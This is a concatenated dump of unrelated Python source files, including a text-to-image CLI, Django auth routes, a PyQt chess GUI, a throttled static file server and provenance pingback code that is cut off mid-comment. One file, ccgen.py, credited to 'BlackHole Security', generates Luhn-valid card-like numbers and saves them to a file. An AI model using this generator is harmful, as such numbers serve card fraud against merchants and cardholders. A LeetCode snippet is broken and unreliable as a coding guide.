save_progress is True. Saves a GIF animation of the generation procedure using the saved frames.\n \"\"\"\n # Don't instantiate imagine if the user just wants help.\n if any(\"--help\" in arg for arg in sys.argv):\n print(\"Type `imagine --help` for usage info.\")\n sys.exit()\n\n num_layers = 32 if deeper else num_layers\n\n imagine = Imagine(\n text=text,\n img=img,\n lr=learning_rate,\n num_layers=num_layers,\n batch_size=batch_size,\n gradient_accumulate_every=gradient_accumulate_every,\n epochs=epochs,\n iterations=iterations,\n image_width=image_width,\n save_every=save_every,\n save_progress=save_progress,\n seed=seed,\n open_folder=open_folder,\n save_date_time=save_date_time,\n start_image_path=start_image_path,\n start_image_train_iters=start_image_train_iters,\n theta_initial=theta_initial,\n theta_hidden=theta_hidden,\n start_image_lr=start_image_lr,\n lower_bound_cutout=lower_bound_cutout,\n upper_bound_cutout=upper_bound_cutout,\n saturate_bound=saturate_bound,\n create_story=create_story,\n story_start_words=story_start_words,\n story_words_per_epoch=story_words_per_epoch,\n save_gif=save_gif\n )\n\n print('Starting up...')\n if not overwrite and imagine.filename.exists():\n answer = input('Imagined image already exists, do you want to overwrite? (y/n) ').lower()\n if answer not in ('yes', 'y'):\n sys.exit()\n\n imagine()\n\n\ndef main():\n fire.Fire(train)\n","sub_path":"deep_daze/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294350084","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nfrom django.views.decorators.csrf import csrf_exempt\napp_name='authentication'\n\nurlpatterns = [\n path('login/',views.Login.as_view(), name='login'),\n path('logout/',views.Logout.as_view(), name='logout'),\n path('signup/',views.signup, name='signup'),\n path('reset/',views.reset, name='reset'),\n path('valid-email/',csrf_exempt(views.ValidateEmail.as_view())),\n path('valid-username/',csrf_exempt(views.ValidateUsername.as_view())),\n path('activate//',views.activate.as_view(),name=\"activate\")\n]","sub_path":"authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"465074804","text":"from gpanel import *\n\ndef drawStone(x, y):\n setColor(getRandomX11Color())\n move(x + size/2, y + size/2)\n fillRectangle(size, size)\n\nmakeGPanel(0, 400, 0, 400)\n\nsize = 50\n\nfor x in range(0, 400, size):\n for y in range(0, 400, size):\n drawStone(x, y) \n\n","sub_path":"tigerjython/TJExamples/03-Gr/Gp3b.py","file_name":"Gp3b.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66880431","text":"import sys\nimport threading\nimport cv2\nfrom PyQt4 import QtGui,QtCore\nfrom serCOM import *\nfrom time import sleep\nfrom chesster import Chesster\n\nclass Window(QtGui.QMainWindow):\n def __init__(self,):\n super(Window,self).__init__()\n self.busy=False\n self.dA=False\n self.dB=False\n self.on=False\n self.w=800\n self.h=480\n self.im_queue=0\n## titulo\n self.label('Chess-ter',size=(self.w,60),frame=\"white\")\n## info secuencias\n self.label('Controles',size=(150,30),pos=(25,60))\n fr1=self.frame(size=(150,370) ,pos=(25,90))\n btt1=self.btn('Nuevo Juego',self.iniciar,size=(120,50),pos=(40,100))\n btt2=self.btn('Calibrar',self.calibrar,size=(120,50),pos=(40,150))\n btt3=self.btn('Jugar',self.jugar,size=(120,50),pos=(40,200))\n btt4=self.btn('Finalizar',self.rep,size=(120,50),pos=(40,250))\n btt5=self.btn('Salir',self.fin,size=(120,50),pos=(40,300))\n self.label('Imagen',size=(350,30),pos=(225,70))\n self.imv=self.label(size=(350,350) ,pos=(225,100),frame='-')\n self.label('Representacion',size=(150,30),pos=(625,70))\n \n \n self.setGeometry(50,50,self.w,self.h)\n self.setWindowTitle('Chess-ter 1')\n self.conecta()\n## self.showFullScreen()\n self.show()\n \n \n \n def frame(self,size=0,pos=0):\n frm=QtGui.QFrame(self)\n if size!=0:\n frm.resize(size[0],size[1])\n if pos!=0: \n frm.move(pos[0],pos[1])\n frm.setFrameShape(QtGui.QFrame.Box)\n frm.setFrameShadow(QtGui.QFrame.Sunken)\n return frm\n def label(self,txt=0,size=0,pos=0,frame=0):\n if frame!=0: \n lfr=self.frame(size,pos)\n if frame!='-':\n stl=\"QFrame { background-color:\"+frame+\"}\"\n lfr.setStyleSheet(stl)\n if txt!=0:\n lbl=QtGui.QLabel(txt,self)\n else:\n lbl=QtGui.QLabel(self)\n if size!=0:\n lbl.resize(size[0],size[1])\n if pos!=0: \n lbl.move(pos[0],pos[1])\n return lbl\n \n def btn(self,name,funct,size=0,pos=0):\n btn=QtGui.QPushButton(name,self)\n btn.clicked.connect(funct)\n if size!=0:\n btn.resize(size[0],size[1])\n if pos!=0:\n btn.move(pos[0],pos[1])\n return btn\n def combo(self,items,size=0,pos=0):\n cbx=QtGui.QComboBox(self)\n if type(items)==tuple:\n for i in range(len(items)):\n cbx.addItem(items[i])\n else:\n cbx.addItem(items[i])\n if size!=0:\n cbx.resize(size[0],size[1])\n if pos!=0:\n cbx.move(pos[0],pos[1])\n cbx.activated[str].connect(self.com_fun)\n return cbx\n def conecta(self):\n print('Conectar')\n if not(self.dA):\n (self.SerA,self.dA)=conectarA()\n if self.dA:\n print('Ca')\n Ca=threading.Thread(name='sa',target=self.conA)\n Ca.start()\n \n if not(self.dB):\n (self.SerB,self.dB)=conectarB()\n if self.dB:\n print('cb')\n Cb=threading.Thread(name='sb',target=self.conB)\n Cb.start()\n def conB(self):\n self.dB=on_B()\n while self.dB==True:\n self.lMb.setText(\"activo\")\n self.fMb.setStyleSheet(\"QFrame { background-color: Green }\" ) \n self.dB=on_B()\n self.lMb.setText(\"inactivo\")\n self.fMb.setStyleSheet(\"QFrame { background-color: Red }\" )\n def conA(self):\n self.dA=on_A()\n while self.dA==True:\n self.lMa.setText(\"activo\")\n self.fMa.setStyleSheet(\"QFrame { background-color: Green }\" ) \n self.dA=on_A()\n self.lMa.setText(\"inactivo\")\n self.fMa.setStyleSheet(\"QFrame { background-color: Red }\" )\n def print_im(self,imc):\n sh=imc.shape\n h=sh[0]\n w=sh[1]\n if len(sh)==3:\n c=sh[2]\n bpl=3*w\n qimc=QtGui.QImage(imc.data,w,h,bpl,QtGui.QImage.Format_RGB888)\n qpix=QtGui.QPixmap()\n qpix.convertFromImage(qimc)\n self.imv.setPixmap(qpix.scaledToHeight(350))\n def iniciar(self):\n if not(self.on):\n self.player=Chesster(bright=55,sharp=100,contrast=100)\n## self.player.preview(2)\n \n def calibrar(self): \n print('calibrar')\n im=self.player.captura()\n imc=self.player.calibracion(im)\n print(imc.shape)\n self.im_queue=imc\n self.print_im(imc)\n def jugar(self):\n print('recon')\n im=self.player.captura()\n (q,b,c,imc)=self.player.get_board(1)\n print(imc.shape)\n print(b)\n print(q)\n self.im_queue=imc\n self.print_im(cv2.merge((imc,imc,imc))) \n def rep(self):\n del self.player\n print(\"rep\")\n def fin(self):\n sys.exit(self)\n\ndef main():\n app=QtGui.QApplication(sys.argv)\n GUI=Window()\n sys.exit(app.exec_())\n \n \ngui=threading.Thread(name='gui',target=main)\ngui.start()\n","sub_path":"tesis/Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"303123302","text":"#!/usr/bin/env python\n\n# Copyright (C) 2012 Eric J. Suh\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n'''Serve static files with a tunable simulated network delay. Useful for\ndeveloping web apps that can handle network degradation with grace.\n\nServes files from the current directory.'''\n\nimport sys\nimport os\nimport argparse\nimport random\nimport time\nimport threading\nimport socket\n\ntry: # Python 3.x\n from urllib.parse import unquote\n from http.server import SimpleHTTPRequestHandler\n from socketserver import ThreadingTCPServer\nexcept ImportError: # Python 2.7.x\n from urllib import unquote\n from SimpleHTTPServer import SimpleHTTPRequestHandler\n from SocketServer import ThreadingTCPServer\n\ndef get_request_handler_class(delay_min, delay_max, srvpath=None):\n '''Returns a subclass of SimpleHTTPRequestHandler that will add delays\n and serve from a different directory.'''\n if srvpath is None:\n srvpath = '.'\n\n class RequestHandler(SimpleHTTPRequestHandler, object):\n def handle(self):\n delay = random.randint(delay_min, delay_max)\n print('Delaying {} ms'.format(delay))\n time.sleep(float(delay)/1000.0)\n super(RequestHandler, self).handle()\n\n def translate_path(self, path):\n path = path.split('?',1)[0].split('#',1)[0]\n path = os.path.normpath(unquote(path))\n words = path.split('/')\n words = filter(None, words)\n path = os.path.abspath(srvpath)\n for word in words:\n word = os.path.splitdrive(word)[1]\n word = os.path.split(word)[1]\n if word in (os.curdir, os.pardir): continue\n path = os.path.join(path, word)\n return path\n\n return RequestHandler\n\n\nclass SoftserveTCPServer(ThreadingTCPServer, object):\n allow_reuse_address = True\n\n def handle_error(self, request, client_address):\n etype, evalue, etrace = sys.exc_info()\n if (evalue is not None\n and isinstance(evalue, socket.error)\n and evalue.errno == 32):\n pass # Just means a connection closed early\n else:\n super(SoftserveTCPServer, self).handle_error(request,\n client_address)\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--port', type=int, default=8000,\n help='port on which to serve files (default: %(default)s)')\n parser.add_argument('--min', type=int, default=1000,\n help='minimum delay in milliseconds (default: %(default)s)')\n parser.add_argument('--max', type=int, default=5000,\n help='maximum delay in milliseconds (default: %(default)s)')\n parser.add_argument('path', default='.', nargs='?', metavar='PATH',\n help='path relative to which to serve files (default: %(default)s)')\n\n args = parser.parse_args(argv)\n\n if (args.max < args.min):\n sys.stderr.write('Error: minimum delay must be less than maximum '\n 'delay\\n')\n return 1\n\n random.seed()\n\n Handler = get_request_handler_class(args.min, args.max, args.path)\n httpd = SoftserveTCPServer((\"localhost\", args.port), Handler)\n server_thread = threading.Thread(target=httpd.serve_forever)\n server_thread.start()\n\n print('Softserving files from {} on port {}. '\n 'Type Ctrl-C to exit.'.format(args.path, args.port))\n try:\n while server_thread.is_alive():\n pass\n except KeyboardInterrupt:\n pass\n finally:\n print('\\nShutting down Softserve.')\n httpd.shutdown()\n httpd.server_close()\n print('Goodbye!')\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"softserve.py","file_name":"softserve.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2758174","text":"class Solution:\n def makeConnected(self, n: int, connections: List[List[int]]) -> int:\n l=len(connections)\n if ln-1:\n return 0\n groups=[connections[1]]\n for i in range(1,l):\n m,n=connections[i]\n flag=0\n for k in range(len(groups)):\n if (m in groups(k)) or (n in groups(k)):\n groups[k].append(n)\n groups[k].append(m)\n flag=1\n if flag==0:\n groups.append([m,n])\n return len(groups)-1\n\nmakeConnected(n = 6, connections = [[0,1],[0,2],[0,3],[1,2],[1,3]])","sub_path":"parlai/agents/hred/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"31310747","text":"# author: DedSecTL/Gameye98\n# team: BlackHole Security\n# sample script for luhn algorithm\nimport random\n\ng = \"\\x1b[1;32m\" # green color format\nn = \"\\x1b[0m\" # normal color format\n\nresult = []\nf = open(\"result.txt\",\"w\")\nwhile True:\n\tif len(result) > 10: break\n\tx = 0\n\tnvar = 0\n\tnum = []\n\tnum_n = []\n\tnum_s = []\n\tfor i in range(random.randrange(13, 17)):\n\t\tnum.append(random.randrange(0,10))\n\tfor num_x in num[:len(num)-1][::-1]:\n\t\tif x == 0:\n\t\t\tnum_xx = num_x * 2\n\t\t\tif num_xx > 9:\n\t\t\t\tnum_xx = num_xx % 10 + 1\n\t\t\tnum_n.append(num_xx)\n\t\t\tx = 1\n\t\telif x == 1:\n\t\t\tnum_n.append(num_x)\n\t\t\tx = 0\n\tfor n in num: num_s.append(str(n))\n\tfor n in num_n: nvar+=n\n\tif int(str(nvar * 9)[-1]) == num[-1]:\n\t\tprint(f\"{g}{''.join(num_s)}{n}\")\n\t\tf.write(\"\".join(num_s)+\"\\n\")\n\t\tresult.append(\"\".join(num_s))\n","sub_path":"ccgen.py","file_name":"ccgen.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242855288","text":"#!/usr/bin/env python\n\"\"\"\n Dummy AMQ producer to test the Kepler service\n\"\"\"\nimport json\nimport argparse\nimport os\nfrom sns_utilities.amq_connector.amq_consumer import Client\nfrom camm_amq.configuration import Configuration\nimport time\n\n# Setup the AMQ client\nconf = Configuration('/etc/kepler_consumer.conf')\nc = Client(conf.brokers, conf.amq_user, conf.amq_pwd)\n\n# Parse command arguments\nparser = argparse.ArgumentParser(description='Dummy Kepler workflow')\nparser.add_argument(conf.kepler_result_queue_flag, metavar='return_queue',\n default='DAKOTA.RESULTS.TEST',\n help='AMQ queue to send results to',\n dest='return_queue')\nparser.add_argument(conf.kepler_work_dir_flag, metavar='working_dir',\n default='/tmp',\n help='Dakota working directory',\n dest='working_dir')\nparser.add_argument(conf.kepler_output_file_flag, metavar='output_file',\n default='results.out',\n help='Kepler output file',\n dest='output_file')\nparser.add_argument('-runwf', metavar='workflow',\n default='Strategist.xml',\n help='Kepler workflow',\n dest='workflow')\nparser.add_argument('-nogui',\n action='store_true',\n help='gui option (dummy)',\n dest='nogui')\nnamespace = parser.parse_args()\n\n# Write dummy results file\nvalue = 123.456\noutput_file_path = os.path.join(namespace.working_dir, namespace.output_file)\n\n# Fake short computation time\ntime.sleep(5)\n\n# Send a simple message to the return queue\nmessage = {'params': 'test',\n 'output_file': output_file_path,\n 'cost_function': value\n }\njson_message = json.dumps(message)\nc.send(destination='/queue/'+namespace.return_queue, message=json_message)\nc._disconnect()\n","sub_path":"activemq/test/dummy_kepler_workflow.py","file_name":"dummy_kepler_workflow.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267781209","text":"\"\"\"\nRecipes available to data with tags ['GMOS', 'CAL', 'DARK'].\nDefault is \"makeProcessedDark\".\n\"\"\"\nrecipe_tags = {'GMOS', 'CAL', 'DARK'}\n\nfrom geminidr.gmos.recipes.sq.recipes_common import makeIRAFCompatible\n\n\ndef makeProcessedDark(p):\n \"\"\"\n This recipe performs the standardization and corrections needed to convert\n the raw input dark images into a single stacked dark image. This output\n processed bias is stored on disk using storeProcessedDark and has a name\n equal to the name of the first input bias image with \"_dark.fits\" appended.\n\n Parameters\n ----------\n p : PrimitivesBASE object\n A primitive set matching the recipe_tags.\n \"\"\"\n\n p.prepare()\n p.addDQ(add_illum_mask=False)\n p.addVAR(read_noise=True)\n p.overscanCorrect()\n p.biasCorrect()\n p.ADUToElectrons()\n p.addVAR(poisson_noise=True)\n # Force \"varclip\" due to large number of CRs\n p.stackDarks(reject_method=\"varclip\")\n p.makeIRAFCompatible()\n p.storeProcessedDark()\n return\n\n\n_default = makeProcessedDark\n","sub_path":"geminidr/gmos/recipes/sq/recipes_DARK.py","file_name":"recipes_DARK.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466624054","text":"#!/usr/bin/env python2\n\nf = open('B-large.in')\n\nUP = '+'\nDOWN = '-'\n\ntestcases = int(f.readline().strip())\n\ndef flip(pancakes, stop):\n pancakes[0:stop] = (UP if c == DOWN else DOWN for c in reversed(pancakes[0:stop]))\n\ndef removeend(pancakes):\n while pancakes and pancakes[-1] == UP:\n pancakes.pop()\n\ndef merge(pancakes):\n i = 0\n while i < len(pancakes)-1:\n if pancakes[i] == pancakes[i+1]:\n pancakes.pop(i)\n else:\n i += 1\n\nfor testcase in xrange(testcases):\n pancakes = list(f.readline().strip())\n\n moves = 0\n\n merge(pancakes)\n removeend(pancakes)\n\n moves = len(pancakes)\n print (\"Case #%s: %s\" % (testcase+1, moves))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_RasmusWL_pancake.py","file_name":"16_0_2_RasmusWL_pancake.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"120728752","text":"try:\n number = float(input(\"Enter number\\n\"))\n if number > 0:\n rub = int(number)\n kop = int((number-rub)*100)\n print(rub, 'rub ', kop, 'kop')\n else:\n raise ValueError\nexcept ValueError:\n print('Error')\n","sub_path":"pylab1/pelab1.1.py","file_name":"pelab1.1.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"474061399","text":"import settings\nfrom rdflib import URIRef\n\n\n# Strategy 1: Given Pingback\ndef try_strategy_1(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n # For each Entity, look for a prov:pingback property\n entities_with_pingback_uris = []\n for entity in entities:\n q = '''\n PREFIX rdfs: \n PREFIX prov: \n SELECT *\n WHERE {\n ?s ?p ?o .\n <''' + entity + '''> prov:pingback ?o .\n }\n '''\n for row in g.query(q):\n entities_with_pingback_uris.append({\n 'entity': str(row['s']),\n 'pingback_endpoint': str(row['o'])}\n )\n\n successful_pingbacks = []\n for entity in entities_with_pingback_uris:\n pingback_uri = entity['pingback_endpoint']\n entity_uri = [entity['entity']]\n result = send_pingback(pingback_uri, entity_uri, further_links=[])\n if result[0]:\n successful_pingbacks.append(entity_uri)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities_with_pingback_uris,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Strategy 2: Given Provenance\ndef try_strategy_2(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n # Get any Entities with a prov:has_provenance, prov:has_query_service or dct:provenance property\n # If one is found, stage for the sending of provenance information bundles\n entities_with_provenance_locations = []\n entities_with_provenance_query_services = []\n for entity in entities:\n q = '''\n PREFIX rdfs: \n PREFIX prov: \n PREFIX dc11: \n SELECT *\n WHERE {\n ?s ?p ?o .\n {<''' + entity + '''> prov:has_provenance ?o .}\n UNION\n {<''' + entity + '''> dc11:provenance ?o .}\n UNION\n {<''' + entity + '''> prov:has_query_service ?o .}\n }\n '''\n for row in g.query(q):\n if str(row['p']) in ['http://www.w3.org/ns/prov#has_provenance', 'http://purl.org/dc/elements/1.1/provenance']:\n entities_with_provenance_locations.append({\n 'entity': str(row['s']),\n 'provenance_location': str(row['o'])\n })\n elif str(row['p']) == 'http://www.w3.org/ns/prov#has_query_service':\n entities_with_provenance_query_services.append({\n 'entity': str(row['s']),\n 'provenance_service': str(row['o'])\n })\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': [],\n 'pingback_successful': []\n }\n\n\n# Strategy 3: Known Provenance Stores\ndef try_strategy_3(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n successful_pingbacks = []\n for entity in entities:\n # make all the PROV-AQ links for each entity\n further_links = [\n {\n 'resource': entity,\n 'rel': 'has_query_service',\n 'anchor': settings.PROMS_INSTANCE_NAMESPACE_URI + '/function/sparql'\n },\n {\n 'resource': entity,\n 'rel': 'has_provenance',\n 'anchor': settings.ENTITY_BASE_URI + '/?uri=' + entity\n }\n ]\n for known_store_pingback_endpoints in settings.KNOWN_PROVENANCE_STORE_PINGBACK_ENDPOINTS:\n if known_store_pingback_endpoints != '':\n #result = send_provaq_pingback(known_store_pingback_endpoints, None, further_links)\n proms_pingback_msg = generate_proms_msg_from_report(g, entities, known_store_pingback_endpoints)\n result1 = send_proms_pingback(known_store_pingback_endpoints, proms_pingback_msg)\n #if result[0]:\n # successful_pingbacks.append(entity)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Strategy 4: Pingback Lookup\ndef try_strategy_4(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n # For each Entity, follow it's URI to look for a prov:pingback property\n entities_with_pingback_uris = []\n for entity in entities:\n \"\"\"\n # look for an RDF description of the Entity\n rdf = cs_functions.get_entity_rdf(entity)\n if rdf[0]:\n print entity\n print rdf[1]\n else:\n print entity\n print 'failed to get RDF'\n \"\"\"\n pingback_endpoints = get_pingback_endpoints_via_lookup(g, entity)\n if len(pingback_endpoints) > 0:\n entities_with_pingback_uris.append({\n 'entity': entity,\n 'pingback_endpoints': pingback_endpoints\n })\n\n successful_pingbacks = []\n for entity in entities_with_pingback_uris:\n entity_uri = [entity['entity']]\n pingback_uris = entity['pingback_endpoints']\n for pingback_uri in pingback_uris:\n result = send_pingback(pingback_uri, entity_uri, further_links=[])\n if result[0]:\n successful_pingbacks.append(entity_uri)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities_with_pingback_uris,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Endpoint Lookup Discovery\ndef try_strategy_5(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n entities_with_pingback_uris = []\n for entity in entities:\n query_service_endpoints = get_has_query_service_endpoints_via_lookup(g, entity)\n if len(query_service_endpoints) > 0:\n entities_with_pingback_uris.append({\n 'entity': entity,\n 'pingback_endpoints': query_service_endpoints\n })\n\n successful_pingbacks = []\n for entity in entities_with_pingback_uris:\n pingback_uris = entity['pingback_endpoints']\n entity_uri = [entity['entity']]\n for pingback_uri in pingback_uris:\n result = send_pingback(pingback_uri, entity_uri, further_links=[])\n if result[0]:\n if entity_uri not in successful_pingbacks:\n successful_pingbacks.append(entity_uri)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Strategy 6: Data Provider Node Given\n# not described in paper yet\ndef try_strategy_6(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n\n# Strategy 6: Data Provider Node Lookup\n# not described in paper yet\ndef try_strategy_7(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n\n# Strategy 1: Given Pingback\ndef get_pingback_endpoints_via_given(g, entity_uri):\n pingback_endpoints = []\n q = '''\n PREFIX prov: \n SELECT ?pb\n WHERE {\n <''' + entity_uri + '''> a prov:Entity .\n <''' + entity_uri + '''> prov:pingback ?pb .\n }\n '''\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n return pingback_endpoints\n\n\n# Strategy 2: Given Provenance\ndef get_has_query_service_endpoints_via_given(g, entity_uri):\n provenance_endpoints = []\n q = '''\n PREFIX prov: \n SELECT ?ps\n WHERE {\n <''' + entity_uri + '''> a prov:Entity ;\n prov:has_query_service ?ps .\n }\n '''\n for row in g.query(q):\n provenance_endpoints.append(str(row['ps']))\n return provenance_endpoints\n\n\n# Strategies 4 & 5\ndef is_dereferencable(entity_uri):\n import requests\n from requests import exceptions\n\n headers = {'Accept': 'text/turtle;q=1,application/ld+json;q=0.75,application/rdf+xml;q=0.5'}\n try:\n r = requests.get(entity_uri, headers=headers, allow_redirects=True)\n if r.status_code == 200:\n return [True, r.text, r.headers]\n else:\n return [False, 'Could not dereference URI']\n except exceptions.RequestException as e:\n return [False, 'Could not dereference URI']\n\n\n# Strategies 4 & 5\ndef has_valid_rdf_meatadata(rdf_metadata, content_type_header):\n # test header. Must find one of three known RDF serialisations\n if 'text/turtle' in content_type_header:\n format = 'turtle'\n elif 'application/ld+json' in content_type_header:\n format = 'json-ld'\n elif 'application/rdf+xml' in content_type_header:\n format = 'xml'\n else:\n return [False, 'no RDF format given in header']\n\n if format is not None:\n from rdflib import Graph\n try:\n g = Graph().parse(data=rdf_metadata, format=format)\n return [True, g]\n except Exception as e:\n return [False, 'RDF format ' + format + ' indicated in header but unable to parse RDF data to graph. Error: ' + str(e)]\n\n\n# Strategy 4: Pingback Lookup\ndef get_pingback_endpoints_via_lookup(g, entity_uri):\n pingback_endpoints = []\n\n # find prov:pingback properties defined for this Entity\n q = '''\n PREFIX prov: \n SELECT ?pb\n WHERE {\n <''' + entity_uri + '''> a prov:Entity ;\n prov:pingback ?pb .\n }\n '''\n\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n\n # find prov:pingback properties defined on a dcat:CatalogRecord for this dcat:Dataset\n q = '''\n PREFIX prov: \n PREFIX dcat: \n PREFIX foaf: \n SELECT ?pb\n WHERE {\n {\n <''' + entity_uri + '''> a dcat:Dataset ;\n foaf:isPrimaryTopicOf ?cr .\n ?cr prov:pingback ?pb .\n }\n UNION\n {\n ?cr a dcat:CatalogRecord ;\n foaf:primaryTopic <''' + entity_uri + '''> ;\n prov:pingback ?pb .\n }\n }\n '''\n\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n\n # find a dpn:Service class object, of type dpns:ProvenancePingbackService, that has the property dpn:hostsDataset indicating the Entity URI.\n # TODO: build a test dataset for this combo\n q = '''\n PREFIX dpn: \n PREFIX dpns: \n SELECT ?pb\n WHERE {\n ?s a dpns:ProvenancePingbackService ;\n dpns:hostsDataset <''' + entity_uri + '''> ;\n dpn:endpoint ?pb .\n }\n '''\n\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n\n return pingback_endpoints\n\n\n# Strategy 5: Provenance Lookup\ndef get_has_query_service_endpoints_via_lookup(g, entity_uri):\n has_query_service_endpoints = []\n\n # find prov:has_query_service properties defined for this Entity\n q = '''\n PREFIX prov: \n SELECT ?pb\n WHERE {\n <''' + entity_uri + '''> a prov:Entity ;\n prov:has_query_service ?pb .\n }\n '''\n\n for row in g.query(q):\n has_query_service_endpoints.append(str(row['pb']))\n\n # find prov:has_query_service properties defined on a dcat:CatalogRecord for this dcat:Dataset\n q = '''\n PREFIX prov: \n PREFIX dcat: \n PREFIX foaf: \n SELECT ?pb\n WHERE {\n {\n <''' + entity_uri + '''> a dcat:Dataset ;\n foaf:isPrimaryTopicOf ?cr .\n ?cr prov:has_query_service ?pb .\n }\n UNION\n {\n ?cr a dcat:CatalogRecord ;\n foaf:primaryTopic <''' + entity_uri + '''> ;\n prov:has_query_service ?pb .\n }\n }\n '''\n\n for row in g.query(q):\n has_query_service_endpoints.append(str(row['pb']))\n\n # find a dpn:Service class object, of type dpns:ProvenanceService, that has the property dpn:hostsDataset indicating the Entity URI.\n # TODO: build a test dataset for this combo\n q = '''\n PREFIX dpn: \n PREFIX dpns: \n SELECT ?pb\n WHERE {\n ?s a dpns:ProvenanceService ;\n dpns:hostsDataset <''' + entity_uri + '''> ;\n dpn:endpoint ?pb .\n }\n '''\n\n for row in g.query(q):\n has_query_service_endpoints.append(str(row['pb']))\n\n return has_query_service_endpoints\n\n\ndef is_a_uri(uri_candidate):\n \"\"\"\n Validates a string as a URI\n\n :param uri_candidate: string\n :return: True or False\n \"\"\"\n import re\n # https://gist.github.com/dperini/729294\n URL_REGEX = re.compile(\n \"^\"\n # protocol identifier\n \"(?:(?:https?|ftp)://)\"\n # user:pass authentication\n \"(?:\\S+(?::\\S*)?@)?\"\n \"(?:\"\n # IP address exclusion\n # private & local networks\n \"(?!(?:10|127)(?:\\.\\d{1,3}){3})\"\n \"(?!(?:169\\.254|192\\.168)(?:\\.\\d{1,3}){2})\"\n \"(?!172\\.(?:1[6-9]|2\\d|3[0-1])(?:\\.\\d{1,3}){2})\"\n # IP address dotted notation octets\n # excludes loopback network 0.0.0.0\n # excludes reserved space >= 224.0.0.0\n # excludes network & 